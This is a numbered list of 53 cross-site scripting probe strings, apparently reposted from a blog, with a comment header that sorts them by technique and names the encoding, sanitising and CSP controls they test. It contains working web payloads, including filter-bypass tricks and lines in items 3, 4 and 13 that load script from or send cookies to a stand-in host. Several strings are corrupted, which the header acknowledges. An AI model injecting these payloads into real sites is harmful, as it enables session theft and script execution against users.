<!--
  Numbered list of cross-site scripting (XSS) probe strings, of the kind used
  to check that an application encodes or rejects untrusted input before it is
  rendered. Each entry is a test input, not page markup; the leading "N." is
  the list index and not part of the string.

  What the entries exercise (numbers refer to the list below):
    * Script element placed in HTML body context: 1, 2, 8, 9, 35, 37.
    * Script fetched from another origin, or document.cookie sent to another
      host: 3, 4, 13.
    * Closing the enclosing context first (attribute value, title, textarea,
      iframe, JavaScript string literal): 12, 14, 15, 19, 25, 29, 31, 39, 48, 53.
    * Event-handler attributes (onerror, onload, onunload, onfocus,
      onmouseover): 6, 22, 23, 24, 25, 28, 39, 44, 49, 50.
    * Script-scheme URLs (javascript:, vbscript:) in src, href, CSS url() and
      meta refresh: 10, 11, 16, 17, 20, 21, 33, 34, 36, 38, 40, 41, 46, 51, 52, 53.
    * CSS expression() and @import inside style content: 7, 18, 27, 45.
    * Tag names split so that a single, non-recursive removal of the inner tag
      or word leaves a script tag behind: 5, 43.
    * Markup-only injection (marquee, h1), which shows that HTML is rendered
      unescaped even when no script runs: 30, 32.
    * BBCode-style input whose values reach attributes of the generated HTML:
      21, 24, 45.
    * 8, 28 and 37 embed PHP tags, so they only matter where input is
      evaluated server-side as PHP. 26 and 47 are bare script statements
      (JavaScript, VBScript), presumably for input reflected inside an existing
      script block. 42 uses the &{...} script-entity syntax of very old
      Netscape browsers.

  Controls these strings are meant to verify:
    * Context-aware output encoding (HTML body, attribute, JavaScript string,
      URL, CSS) at the point of rendering.
    * An allow-list of URL schemes (http, https) for src/href and for BBCode
      url and colour values.
    * Sanitising with a parser-based allow-list instead of stripping
      substrings; 5 and 43 show why one-pass stripping fails.
    * A Content-Security-Policy that disallows inline script and restricts
      script sources (relevant to 3 and 13), and HttpOnly on session cookies
      (relevant to 4).

  Reading results: many entries rely on legacy browser behaviour (expression()
  in old Internet Explorer, LOWSRC/DYNSRC, javascript: in image sources,
  vbscript:). A string that does not fire in a current browser does not show
  that the output is encoded; inspect the rendered source for the raw string.

  Fidelity of this listing: the strings are not byte-accurate. Straight quotes
  appear as ‘, item 10 contains a Unicode replacement character, item 44
  contains an e-mail-protection placeholder, and some entries are
  syntactically broken as written (for example 4, 15, 29, 35). Take regression
  fixtures from a maintained source rather than from this listing.
-->
1.<script> alert(1);</script>
2.<script>alert(‘xss‘);</script>
3.<script src="http://www.evil.com/cookie.php"></script>
4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>
5.<scr<script>ipt>alert(‘xss‘);</scr</script>ipt>
6.<img src=liu.jpg onerror=alert(/xss/)/>
7.<style>@im\port‘\ja\vasc\ript:alert(\"xss\")‘;</style>
8.<?echo(‘<src)‘; echo(‘ipt>alert(\"xss\")‘;</script>‘);?>
9.<marquee><script>alert(‘xss‘)</script></marquee>
10.<IMG SRC=\"jav�x9;ascript:alert(‘xss‘);\">
11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
12."><script>alert(1)</script>
13.<script src=http://www.evil.com/files.js></script>
14.</title><script>alert(/xss/)</script>
15.</textarea><script>alert(/xss)</script>
16.<IMG LOWSRC=\"javascript:alert(‘XSS‘)\">
17.<IMG DYNSRC=\"javascript:alert(‘XSS‘)\">
18.<font style=‘color:expression(alert(document.cookie))‘>
19.‘);alert(‘XSS
20.<img src="javascript:alert(‘XSS‘)">
21.[url=javascript:alert(‘XSS‘);]click me[/url]
22.<body onunload="javascript:alert(‘XSS‘);">
23.<body onLoad="alert(‘XSS‘);"
24.[color=red‘ onmouseover="alert(‘XSS‘)"]mouse over[/color]
25."/></a></><img src=1.gif onerror=alert(1)>
26.window.alert("XSS");
27.<div style="x:expression((window==1)?":eval(‘r=1;alert(String.fromCharCode(83,83,83));‘))">
28.<iframe<?php eval chr(11)?>onload=alert(‘XSS‘)></iframe>
29."><script alert(String.fromCharCode(88,83,83))</script>
30.‘>><marquee><h1>XSS<h1></marquee>
31.‘">><script>alert(‘xss‘)</script>
32.‘">><marquee><h1>XSS</h1></marquee>
33.<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(‘XSS‘);\">
34.<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;URL=http://;url=javascript:alert(‘XSS‘);\">
35.<script>var var=1; alert(var)</script>
36.<STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>
37.<?=‘<SCRIPT>alert("XSS")</SCRIPT>‘?>
38.<IMG SRC=‘vbscript:msgbox(\"XSS\")‘>
39."onfocus=alert(document.domain)"><"
40.<FRAMESET><FRAME SRC=\"javascript:alert(‘XSS‘);\"></FRAMESET>
41.<STYLE>li {list-style-image:url(\"javascript:alert(‘XSS‘)\");}</STYLE><UL><LI>XSS
42.<br size=\"&{alert(‘xss‘)}\">
43.<scrscriptipt>alert(1)</scrscriptipt>
44."><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")>
45.[color=red width=expression(alert(123))][color]
46.<BASE HREF="javascript:alert(‘XSS‘);//">
47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<
48."></iframe><script>alert(123)</script>
49.<body onLoad="while(true) alert(‘XSS‘);">
50."<marquee><img src=k.png onerror=alert(/xss/) />
51.<div style="background:url(‘javascript:‘)
52.<img src=‘java\nscript:alert(\"XSS\")‘>
53.>‘"><img src="javascript:alert(‘xss‘)">
原文地址:https://www.cnblogs.com/bl8ck/p/9610294.html